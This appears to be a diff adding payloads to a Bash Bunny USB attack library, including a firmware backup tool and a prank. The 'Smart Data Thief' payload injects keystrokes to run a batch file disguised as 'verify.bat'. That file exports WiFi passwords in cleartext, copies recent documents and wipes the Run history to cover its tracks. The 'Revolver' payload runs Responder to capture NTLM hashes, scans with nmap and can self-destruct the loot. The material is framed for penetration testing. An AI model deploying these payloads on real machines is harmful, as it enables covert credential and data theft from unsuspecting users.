# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny
# Files
# -----
# - payload.txt: Starts and monitors the attack. All configuration contained in this file.
# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't
# verify anything it is just called that because it is "in disguise"
# Setup
# -----
# - Place the payload.txt and verify.bat on either switch directory
# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility
# LEDs
# ----
# Magenta: Initial setup about 1 3 seconds
# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed
# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"
# Total time allocated for the attack, after which the Bash Bunny will shutdown
EJECT_TIME=30
# BLE ID to stop attack immediately and go to shutdown
ABORT_MISSION="QSTOP"
# Flash a bunch of windows and lock PC if ABORT mission received
DISTRACT_ON_ABORT=false
# Do we wait for a start trigger? And what is it?
WAIT_FOR_TRIGGER=false
START_MISSION="QSTART"
# Setup
# -----
LED SETUP
# Start bluetooth for observation
source bunny_helpers.sh
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
# Wait for "button job" if desired
if $WAIT_FOR_TRIGGER; then
CUCUMBER ENABLE
LED Y SLOW
WAIT_FOR_PRESENT $START_MISSION
fi
# Attack
# ------
CUCUMBER DISABLE
ATTACKMODE HID STORAGE
Q DELAY 1000
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')"
Q ENTER
# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE
for (( c=1; c<=$EJECT_TIME; c++ ))
do
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
if $DISTRACT_ON_ABORT; then
for i in {1..5}
do
Q GUI d
Q DELAY 200
done
Q GUI l
fi
break
fi
done
sync
LED FINISH
Q DELAY 1500
shutdown now

54
payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md Normal file
View File

@ -0,0 +1,54 @@
## Smart Data Thief
Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options:
- Copies are timed to be as fast or as long as you want. Youll know
exactly how long you have per workstation, and also know you can
remove the Bash Bunny safely once it the time expires
- The copy may be configured to stop when a secret BLE beacon is sent
the Bash Bunny will shut down for immediate removal.
- Concerned that someone might see the attack? Configure the payload to
flash windows and suddenly lock before shutting down the Bash Bunny,
which gives the payload time to clean up its tracks while you make
appropriate excuses.
- Want to trigger the payload from afar? Make the attack a “button job”
the Bash Bunny will take advantage of Cool Cucumber CPU usage while
waiting for the secret BLE beacon.
The payload may be used with or without a SD card and places loot in a folder with the computers name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days however feel free to tailor parameters to your unique pentest situation.
**Targets**
1. All WiFi creds used by the workstation
2. The past 30 days in both Desktop and Documents for:
- Word docs
- Excel spreadsheets
- Loose email files (*.msg)
- Text files
- OneNote notebooks
**Files Used**
- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file.
- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything it is just called that because it is "in disguise"
**Setup**
1. Place the payload.txt and verify.bat on either switch directory
2. If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running)
3. For maximum versatility, place verify.bat in both locations
**Payload Configuration**
Change any of the constants below to match your mission parameters:
- BB_NAME: Make sure you have the right Bash Bunny name in this constant
- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown
- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon
- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction.
- WAIT_FOR_TRIGGER: Dont start the attack immediately but wait for the BLE beacon.
- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true.
**LED meanings**
- Magenta: Initial setup about 1 3 seconds
- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE
- Single yellow blink: Attack in progress
- Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed

14
payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat Normal file
View File

@ -0,0 +1,14 @@
@echo off
cd /d %~dp0
mkdir \loot\WiFiCreds\%COMPUTERNAME%
cd \loot\WiFiCreds\%COMPUTERNAME%
netsh wlan export profile key=clear
timeout 1
mkdir \loot\DriveLast30\%COMPUTERNAME%
cd \loot\DriveLast30\%COMPUTERNAME%
robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
timeout 1
exit

22
payloads/library/exfiltration/Win_PoSH_ReadItOut/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Read It Out
# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
# Author: Cribbit
# Version: 1.0
# Category: Exfiltration
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID
QUACK DELAY 500
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
LED FINISH

27
payloads/library/exfiltration/Win_PoSH_ReadItOut/readme.md Normal file
View File

@ -0,0 +1,27 @@
# Read It Out
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Exfiltration
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Super subtle exfiltration method.
Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
## Config
Add -r to do subdirectorys
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |

23
payloads/library/general/Bluetooth2/README.md Normal file
View File

@ -0,0 +1,23 @@
# BlueTooth2
BlueTooth2 is a program that scans for two bluetooth devices and depending on what one it finds it runs whatever.
## What it Does and How its Different
Unlike the standard WAIT_FOR_PRESENT that scans for one device and doesnt allow code after it to run until found.
This will do a scan and then check for two different devices names allowing for multiple remote triggers that
can do different things.
## Note
I imagine your looking at this code and wondering what idiot wrote it and I would very cool if you would
make it more efficient or even pretty. It worked when I tested it (I use BLE Tool)
## LED
| COLOR | DESCRIPTION |
|---------|-------------|
| White | Scan |
| Yellow | Checking |
| Green | Attack1 |
| Blue | Attack2 |

76
payloads/library/general/Bluetooth2/payload.txt Normal file
View File

@ -0,0 +1,76 @@
#!/bin/bash
#
# Title: BlueTooth2
# Description: multiple remote triggers
# Author: JustaProgrammer9
# Category: General
# Target: Windows
# Attackmodes: HID
# Suggestion: Use BLE Tool if triggers take to long
#
#--// Function \\--#
WAIT_FOR_BLUETOOTH() {
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
}
#------------------#
#--// Setup/Config \\--#
ATTACKMODE HID
device="notepad"
otherdevice="attack"
#----------------------#
#--// Check for devices \\--#
while true; do
LED W
WAIT_FOR_BLUETOOTH
LED Y
if grep -qao $device /tmp/bt_observation; then
if1="true"
break
sleep 1
elif grep -qao $otherdevice /tmp/bt_observation; then
if2="true"
break
sleep 1
#add more if's for more bluetooth devices to look for
fi
done
#---------------------------#
#--// Your attacks \\--#
if [ $if1 = "true" ]; then
LED G
Q GUI r
Q DELAY 100
Q STRING "notepad"
Q ENTER
Q DELAY 200
Q STRING "Hak5 rules"
Q ENTER
elif [ $if2 = "true" ]; then
LED B
# do something cool here
else
LED R
fi

92
payloads/library/general/FICBunny/UIBEX.py Executable file
View File

@ -0,0 +1,92 @@
#!/bin/python2
from __future__ import absolute_import
import sys
import datetime
import base64
import binascii
import struct
import time
from io import open
try:
try:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"x")
except FileExistsError:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
except NameError:
try:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
except OSError:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"w")
if len(sys.argv) != 2:
sys.stdout.write(u"Usage: {a} <Ubootimage/Block device containing image>\n".format(a=sys.argv[0]))
sys.exit(1)
LogFile.write(u"[{a}]: Opening file {b} for reading...\n".format(a=datetime.datetime.utcnow(),b=sys.argv[1]))
try:
InFileHan = open(sys.argv[1],u"rb")
except OSError as E:
LogFile.write(u"[{a}]: Error. {E}\n".format(a=datetime.datetime.utcnow(),E=str(E)))
sys.exit(1)
LogFile.write(u"[{a}]: File open. Loading header....\n".format(a=datetime.datetime.utcnow()))
InHeader = InFileHan.read(64)
LogFile.write(u"[{a}]: Header loaded. Checking Magic.\n".format(a=datetime.datetime.utcnow()))
try:
assert InHeader[0:4:] == "'\x05\x19V"
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, magic is not correct.\n".format(a=datetime.datetime.utcnow()))
sys.exit(1)
LogFile.write(u"[{a}]: Magic verified.\n".format(a=datetime.datetime.utcnow()))
InHedC = InHeader + "1"
InHedC = InHedC[0:64:]
# Blanking CRC.
InHedC = InHedC[0:4:] + "\x00\x00\x00\x00" + InHedC[8::]
# Verify CRC.
HeaderCRC = struct.pack(">i",binascii.crc32(InHedC))
try:
assert HeaderCRC == InHeader[4:8:]
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC),c=base64.b16encode(InHeader[4:8:])))
sys.exit(1)
LogFile.write(u"[{a}]: Header CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC)))
LogFile.write(u"[{a}]: Searching for uImage data.\n".format(a=datetime.datetime.utcnow()))
# Grab length and verify data.
ImageLength = struct.unpack(">i",InHeader[12:16])[0]
ImageData = InFileHan.read(ImageLength)
LogFile.write(u"[{a}]: uImage data loaded.\n".format(a=datetime.datetime.utcnow()))
# Verify CRC.
DataCRC = struct.pack(">i",binascii.crc32(ImageData))
try:
assert DataCRC == InHeader[24:28:]
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC),c=base64.b16encode(InHeader[24:28:])))
sys.exit(1)
LogFile.write(u"[{a}]: Data CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC)))
LogFile.write(u"[{a}]: Both CRC's have been verified. Extraction complete.\n".format(a=datetime.datetime.utcnow()))
LogFile.write(u"[{a}]: Here is header information:\n".format(a=datetime.datetime.utcnow()))
HeaderDataT = [
(u"Image Header Magic Number",base64.b16encode(InHeader[0:4]).decode()),
(u"Image Header CRC Checksum",base64.b16encode(InHeader[4:8]).decode()),
(u"Image Creation Timestamp",base64.b16encode(InHeader[8:12]).decode()),
(u"Image Data Size",base64.b16encode(InHeader[12:16]).decode()),
(u"Data Load Address",base64.b16encode(InHeader[16:20]).decode()),
(u"Entry Point Address",base64.b16encode(InHeader[20:24]).decode()),
(u"Image Data CRC Checksum",base64.b16encode(InHeader[24:28]).decode()),
(u"Operating System",ord(InHeader[28])),
(u"CPU architecture",ord(InHeader[29])),
(u"Image Type",ord(InHeader[30])),
(u"Compression Type",ord(InHeader[31])),
(u"Image Name",InHeader[32::].split("\x00")[0].decode())
]
for x in HeaderDataT:
LogFile.write(u"{x0}: {x1}\n".format(x0=x[0],x1=x[1]))
OutFileName = "./uImage-{a}.img".format(a=int(time.time()//1))
LogFile.write(u"[{a}]: Writing image to {OutFileName}\n".format(a=datetime.datetime.utcnow(),OutFileName=OutFileName))
OutFileHan = open(OutFileName,u"wb")
OutBytes = OutFileHan.write(InHeader + ImageData)
LogFile.write(u"[{a}]: Written {OutBytes} bytes.\n".format(a=datetime.datetime.utcnow(),OutBytes=OutBytes))
LogFile.write(u"[{a}]: -------------------------------------------------------\n".format(a=datetime.datetime.utcnow()))
LogFile.close()
sys.exit(0)

156
payloads/library/general/FICBunny/payload.txt Normal file
View File

@ -0,0 +1,156 @@
#!/bin/bash
#
# Title: FICBunny
# Description: Firmware Image Creator for the Bash Bunny
# Author: HSF3232
# Version: 1.0
# Last tested Bunny Firmware version: 1.7
#
# LED STATUS
# Slow blinking Red - Failed to get the script. Please check that "UIBEX.py" exists within the payload directory.
# Solid Magenta - Setup in progress...
# Single blinking Yellow - STAGE 1
# Double blinking Yellow - STAGE 2
# Triple blinking Yellow - STAGE 3
# Quadruple blinking Yellow - STAGE 4
# Solid Red (After STAGE 4) - Firmware image is missing. If WriteToRecovery is on, will copy the missing firmware image to recovery.
# Quadruple blinking Cyan (After STAGE 4) - Firmware image exists. If Overwrite and WriteToRecovery are on, will replace the firmware image.
# Very fast Blinking Magenta - I am writing to the recovery partition, DO NOT UNPLUG!
########
# VARS #
########
# WriteToRecovery - When firmware image extraction is complete, write the firmware image to recovery?
WriteToRecovery=1
# Overwrite - If an existing firmware file is detected within recovery, overwrite it?
Overwrite=0
#################################
# DO NOT TOUCH BELOW THIS LINE! #
#################################
GET SWITCH_POSITION
###############
# SETUP Stage.#
###############
# Setup stage will force turn off ATTACKMODE to allow access to storage, then we will copy the required script and make the necessary directories.
ATTACKMODE OFF # Enforce no access to storage. Once execution is complete, we will turn ATTACKMODE to SERIAL STORAGE.
LED SETUP
mount /dev/nandf /root/udisk # Ensure udisk is avalible to copy our UIBEX script.
switchPOS=$SWITCH_POSITION
if [ ! -e /root/udisk/payloads/$switchPOS/UIBEX.py ]; then # Needed uImage extraction script wasn't found...
LED FAIL
exit 1
fi
mkdir /tmp/rootexfs # Temporary directory for holding blank system folders and the UIBEX.py script.
mkdir /tmp/massdisk # /dev/nandf OR /dev/mmcblk0p1. We will copy our completed firmware image here for later keeping.
# Since we're executing this script from /tmp, we can unmount udisk once we're ready.
mkdir /tmp/recdisk # /dev/nandg. We will be copying our completed firmware image here once done to re-enable recovery.
mkdir /tmp/cachedisk # /dev/nandh. We will need this to store our large temporary files.
cp /root/udisk/payloads/$switchPOS/UIBEX.py /tmp/rootexfs # Copy the required script.
sleep 1 # Safety net, copying the file over.
umount /root/udisk # We're finished here.
cd /tmp/rootexfs # Using CD to change our working directory to rootexfs so we can execute UIBEX.py.
mkdir media mnt proc sys tmp # Make blank directories - We will use this later for creating rootfs.tar
chmod 555 proc sys # dr-xr-xr-x
chmod 777 tmp # drwxrwxrwx
# Mounting required partitions.
if [ -b /dev/mmcblk0p1 ]; then # If we have the SD card available to us, mount it.
mount /dev/mmcblk0p1 /tmp/massdisk
else
mount /dev/nandf /tmp/massdisk
fi
mount /dev/nandg /tmp/recdisk # Make recovery disk mount point.
mount /dev/nandh /tmp/cachedisk # Make cache disk mount point.
mkdir /tmp/cachedisk/upgrade # Make upgrade directory - we will place rootfs and uImage in here.
mkdir -p /tmp/massdisk/loot/recscript # Make storage location for output of all script related content.
###########
# STAGE 1 #
###########
# Extract the uImage file.
LED STAGE1
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
python2 UIBEX.py /dev/nandc # Execute uImage extraction script.
mv uImage*.img /tmp/cachedisk/upgrade/uImage # move uImage to the upgrade folder
md5sum /tmp/cachedisk/upgrade/uImage > /tmp/cachedisk/upgrade/uImage.md5 # Calculate MD5, save to upgrade folder.
mv UIBEX_ExtractionLog.txt /tmp/massdisk/loot/recscript/ # Move the extraction log to output folder.
# UIBEX complete.
###########
# STAGE 2 #
###########
# Copy all system directories into rootfs.tar
LED STAGE2
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for the user interface.
tar --transform 's,^,/rootfs/,S' -cvf /tmp/cachedisk/upgrade/cherry.rootfs.tar media/ mnt/ proc/ sys/ tmp/ /boot/ /home/ /opt/ /srv/ /dev/pts /dev/shm/ /dev/fd/ /dev/ptmx /dev/stderr /dev/stdin /dev/stdout /dev/full /dev/null /dev/random /dev/urandom /dev/zero /dev/tty /root/ /run/ /etc/ /sbin/ /bin/ /lib/ /var/ /usr/ &> /tmp/massdisk/loot/recscript/RootFS_EX_errors.txt > /tmp/massdisk/loot/recscript/RootFS_EX_output.txt
# Tar all filesystem resources to rootfs.tar in upgrade folder
md5sum /tmp/cachedisk/upgrade/cherry.rootfs.tar > /tmp/cachedisk/upgrade/cherry.rootfs.tar.md5 # Calculate MD5, save to upgrade folder.
# TAR image extraction is complete.
###########
# STAGE 3 #
###########
# Compile firmware file.
LED STAGE3
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
# Now complie the tar.gz to /tmp/massdisk/
cd /tmp/cachedisk/ # Need to move to cache disk, otherwise files would be located at /tmp/cachedisk/upgrade, not what we want!
tar -czvf "/tmp/massdisk/loot/recscript/ch_fw_`cat /root/version.txt`.tar.gz" upgrade &> /tmp/massdisk/loot/recscript/Firmware_Com_errors.txt > /tmp/massdisk/loot/recscript/Firmware_Com_output.txt
cd /tmp/rootexfs # Move back to orignal directory.
# Image compliation completed.
###########
# STAGE 4 #
###########
# Check if firmware file exists in recdisk. If not, copy generated firmware file to recdisk.
LED STAGE4
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
# Let's check if an image already exists in the recdisk.
startString="ch_fw_"
entry=`ls /tmp/recdisk/root/ | while read line; do echo ${line} | grep "^$startString.*.tar.gz$";done | head -n 1`
NeedToWriteFirmWareImage=0
if [ "$entry" = "" ]; then
LED R SOLID # Indicate that a firmware image was missing.
sleep 1
NeedToWriteFirmWareImage=1
else
LED C QUAD # An existing firmware image was found.
sleep 1
if [ $Overwrite -eq 1 ]; then
NeedToWriteFirmWareImage=1
fi
fi
if [ $NeedToWriteFirmWareImage -eq 1 ] && [ $WriteToRecovery -eq 1 ]; then
LED M VERYFAST # Copying firmware image from massdisk to recovery disk.
cp /tmp/massdisk/loot/recscript/ch_fw*.tar.gz /tmp/recdisk/root/
sync # Just in case.
fi
###########
# CLEANUP #
###########
LED CLEANUP
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
# Removing a bunch of directories.
rm -R /tmp/cachedisk/*
sync
umount /tmp/cachedisk
umount /tmp/massdisk
umount /tmp/recdisk
rmdir /tmp/cachedisk
rmdir /tmp/massdisk
rmdir /tmp/recdisk
rm -R /tmp/rootexfs
##########
# FINISH #
##########
LED FINISH
sleep 1
# End of the script will swap to LED BLUE SLOW and activate our storage.
LED B SLOW
ATTACKMODE SERIAL STORAGE
exit 0

38
payloads/library/general/FICBunny/readme.md Normal file
View File

@ -0,0 +1,38 @@
## FICBunny
* Title: FICBunny
* Short Description: Firmware Image Creator for the Bash Bunny
* Author: HSF3232 (@Hacksawfred3232)
* Contributer: Austin Spraggins (@spragginsdesigns)
* Version: 1.0
* Last tested Bunny Firmware version: 1.7
## Long Description
The primary purpose of this script is to create a backup image (in case you want to revert to a known good point). Then replace the missing firmware image within /dev/nandg, should it be missing.
Note: It may be a good idea to disable non-critical services - if any - on the bunny before starting this payload.
**WARNING: /dev/nandg CONTAINS RECOVERY RELATED FILES! WHILE I HAVE TESTED THIS SCRIPT MANY TIMES TO ENSURE IT DOESN'T DO ANYTHING SCREWEY, YOU NORMALLY SHOULD NOT TOUCH /dev/nandg! IF YOU DON'T WANT TO MESS WITH THE RECOVERY PARTITION, TURN OFF "WriteToRecovery"!!**
## Variables
| Name | Description | Default |
| --------------- | --------------------------------------------------------------------------------- | ------- |
| WriteToRecovery | When firmware image extraction is complete, write the firmware image to recovery? | 1 |
| Overwrite | If an existing firmware file is detected within recovery, overwrite it? | 0 |
## STATUS
| LED | Status |
| ----------------------- | ------------------------------------------------------------------------------------------------------------- |
| SETUP | Copying required script file to /tmp, creating needed directories, and mounting partitions |
| FAIL | Couldn't find the file of script needed within payload directory |
| STAGE 1 | Extracting uImage file |
| STAGE 2 | Copying rootFS into rootfs.tar |
| STAGE 3 | Compile the firmware file from rootfs.tar and uImage into a file on MassDisk |
| STAGE 4 | Looking in Recovery partition for backup firmware image |
| R SOLID | Backup firmware image missing! If told to, will copy generated backup firmware image into recovery. |
| C QUAD | Backup firmware image found! If told to, script will overwrite it. |
| M VERYFAST | Writing to recovery partition, **DO NOT UNPLUG!!!!** |
| CLEANUP | Removing temporary directories and unmounting partitions |
| FINISH | Script is finished, starting arming mode (ATTACKMODE SERIAL STORAGE) |

261
payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt Normal file
View File

@ -0,0 +1,261 @@
# Title: Revolver
# Description: Multiple network attacks and modes based on BLE beacons
# Author: saintcrossbow
# Props: Hak5Darren (BLE, QuickCreds, nmap)
# Version: 1.0
# Category: General
# Target: Windows 10 with minimum powershell usage
# Attackmodes: All
# Full Description
# ----------------
# This payload was made in the style of Q Branch: those that use this need to know they have
# multiple options for attack as well as getting out of a bad situation. Switching into this
# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start
# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The
# payload is easily extendable to include any attack you might need in the field.
#
# Note other payloads were co-opted into this multimode attack, and to make it easy I used
# Hak5Darren's code, partially because I imagine he wants to see these payloads extended,
# and also because I know he appreciates Q Branch.
# Configuring
# -----------
# Change the BLE beacon commands listed in Options below to something unique to you. Definitely
# do not want someone else activating your Bash Bunny. Also verify the responder and nmap
# options are to your liking.
# Usage
# -----
# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the
# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop.
# LEDs
# ----
# Slow white LED: Awaiting BLE commands
# Yellow: Attack in progress
# Red: Self destruct of loot
# Blue solid: USB mode
# Cyan solid: Ethernet mode
# Options
# -------
REQUIRETOOL responder
# BLE beacon options - change to your preferences. Make sure to use things
# you'll not encounter since you don't want to start a self-destruct sequence
# on accident
ABORT_MISSION="QSTOP"
START_QUICKCREDS_WIN="QCREDS"
START_QUICKCREDS_NIX="QCREDNIX"
START_NMAP="QNMAP"
START_USB="QLOOT"
START_ETHER="QETHER"
START_DEL_LOOT="QSELFD"
# Responder options
RESPONDER_OPTIONS="-w -r -d P"
RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds
# Nmap options
NMAP_OPTIONS = "-sS -O -sV -F -oA"
NMAP_LOOTDIR=/root/udisk/loot/nmap
# Setup
# -----
LED SETUP
# Responder
# ---------
# Note: This is a modified version of quick creds
# Original by Hak5Darren
# ---------
startResponder()
{
CUCUMBER DISABLE
# Set convenience variables
GET TARGET_HOSTNAME
GET TARGET_IP
# Setup named logs in loot directory
mkdir -p $RESPONDER_LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT
# As a backup also copy logs to a loot directory in /root/loot/
mkdir -p /root/loot/quickcreds/$HOST-$COUNT
# Check target IP address. If unset, blink RED and end.
if [ -z "${TARGET_IP}" ]; then
LED FAIL2
exit 1
fi
# Set LED yellow, run attack
LED ATTACK
cd /tools/responder
# Clean logs directory
rm logs/*
# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &
# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
# Ima just loop here until NTLM logs are found
sleep 1
done
# copy logs to loot directory
cp logs/* /root/loot/quickcreds/$HOST-$COUNT
cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT
# Sync USB disk filesystem
sync
LED FINISH
Q DELAY 1500
# Return to waiting mode
CUCUMBER ENABLE
LED W SLOW
}
# Nmap
# ----
# Note: This is a modified version of one of the very first payloads, nmap
# Original by Hak5Darren
# ----
startNmap()
{
CUCUMBER DISABLE
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP
# Setup named logs in loot directory
mkdir -p $NMAP_LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l)
COUNT=$((COUNT+1))
if [ -z ""${TARGET_IP} ]; then
LED FAIL
Q DELAY 1500
else
LED ATTACK
nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log
sync
LED FINISH
Q DELAY 1500
fi
# Return to waiting mode
CUCUMBER ENABLE
LED W SLOW
}
startLoot()
{
CUCUMBER DISABLE
# We are going for solid LED this time in case the device needs to be played off as normal USB
# ... and best of luck to you on that!
LED B SOLID
ATTACKMODE STORAGE
}
# For sharing, getting on via putty, or exiting USB mode
startEthernet()
{
CUCUMBER DISABLE
LED C SOLID
ATTACKMODE RNDIS_ETHERNET
}
# Delete everything in loot directory
# Depending on your engagement, could also delete switch and library - but be careful!
# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. Going plaid
# to delete those files
startSelfDestruct()
{
ATTACKMODE HID
CUCUMBER PLAID
LED R SOLID
rm -r /root/udisk/loot
rm -r /root/loot/
sync
shutdown now
}
# Main
# ----
# Start bluetooth for observation
source bunny_helpers.sh
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
# Wait for BLE
CUCUMBER ENABLE
LED W SLOW
while :
do
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
# Shutdown
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
sync
LED FINISH
Q DELAY 1500
shutdown now
fi
# Responder - Windows
if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then
ATTACKMODE RNDIS_ETHERNET
startResponder
fi
# Responder - *nix or mac
if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then
ATTACKMODE ECM_ETHERNET
startResponder
fi
# Start nmap against host
if grep -ao $START_NMAP /tmp/bt_observation; then
startNmap
fi
# Open as USB device
if grep -ao $START_USB /tmp/bt_observation; then
startLoot
fi
# Open as Ethernet device
if grep -ao $START_ETHER /tmp/bt_observation; then
startEthernet
fi
# Limited self-destruct of loot
if grep -ao $START_DEL_LOOT /tmp/bt_observation; then
startSelfDestruct
# Leave the scene after the delete
break
fi
done
sync

25
payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md Normal file
View File

@ -0,0 +1,25 @@
## Revolver
This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field.
Note other payloads were co-opted into this multimode attack, and to make it easy
I used Hak5Darren's code, partially because I imagine he wants to see these payloads
extended, and also because I know he appreciates Q Branch.
**Features**
- Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons
- Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct
- After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down)
**Payload Configuration**
1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny!
2. Verify the responder and nmap options are to your liking
**LED meanings**
- Slow 1 second white on and off: Awaiting commands
- Single yellow blink: Attack in progress
- Green rapid flash, then solid: Attack complete
- Solid red: Loot self-destruct - complete and ready to remove when off
- Solid blue: USB mode
- Solid cyan: Ethernet mode

90
payloads/library/prank/Win_PoSH_ExcelQRRickroll/QRcode.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

20
payloads/library/prank/Win_PoSH_ExcelQRRickroll/payload.txt Normal file
View File

@ -0,0 +1,20 @@
# Title: Excel QR Rickroll
# Description: Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED ATTACK
